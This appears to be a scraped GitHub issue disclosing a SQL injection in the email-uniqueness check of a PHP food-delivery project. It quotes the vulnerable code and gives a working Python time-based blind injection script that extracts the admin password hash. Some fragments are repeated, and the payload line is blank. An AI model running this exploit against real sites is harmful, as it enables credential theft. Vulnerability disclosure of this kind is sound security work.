Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
When registering a new account, it will verify that the email address is being used.
web/Lib/Action/PublicAction.class.php
//邮箱重复验证 Public function checkemail(){ $Member=M('Members'); $data['useremail']=$_POST["param"]; $reuseremail=$Member->where($data)->select(); if(empty($reuseremail)) { echo '{ "info":"", "status":"y" }'; } else{ echo '{ "info":"该邮箱已注册,请更换其他邮箱!", "status":"n" }'; } }
We can bypass the SQL filter using this payload:
The final SQL statement would be
SELECT * FROM `sn_members` WHERE ( (`useremail` and sleep(5)) )
And here is the exp to obtain admin's password hash:
#!/usr/bin/env python # -*- coding: utf-8 -*- import requests from string import ascii_letters, digits from time import time url = "http://127.0.0.1/waimai/index.php?m=public&a=checkemail" cnt = 0 userpass = '' for i in xrange(99): for j in ascii_letters + digits: data = {"param[0]": "exp", "param[1]": "and if ((select userpass from sn_members \ where username=0x61646d696e and userpass like BINARY '{}%'),sleep(2),1)" .format(userpass + j), "name": "useremail"} start_time = time() r = requests.post(url=url, data=data) if time() - start_time > 2: userpass = userpass + j print userpass cnt += 1 if cnt == i: break
The text was updated successfully, but these errors were encountered:
No branches or pull requests
When registering a new account, it will verify that the email address is being used.
web/Lib/Action/PublicAction.class.php
We can bypass the SQL filter using this payload:

The final SQL statement would be
And here is the exp to obtain admin's password hash:
The text was updated successfully, but these errors were encountered: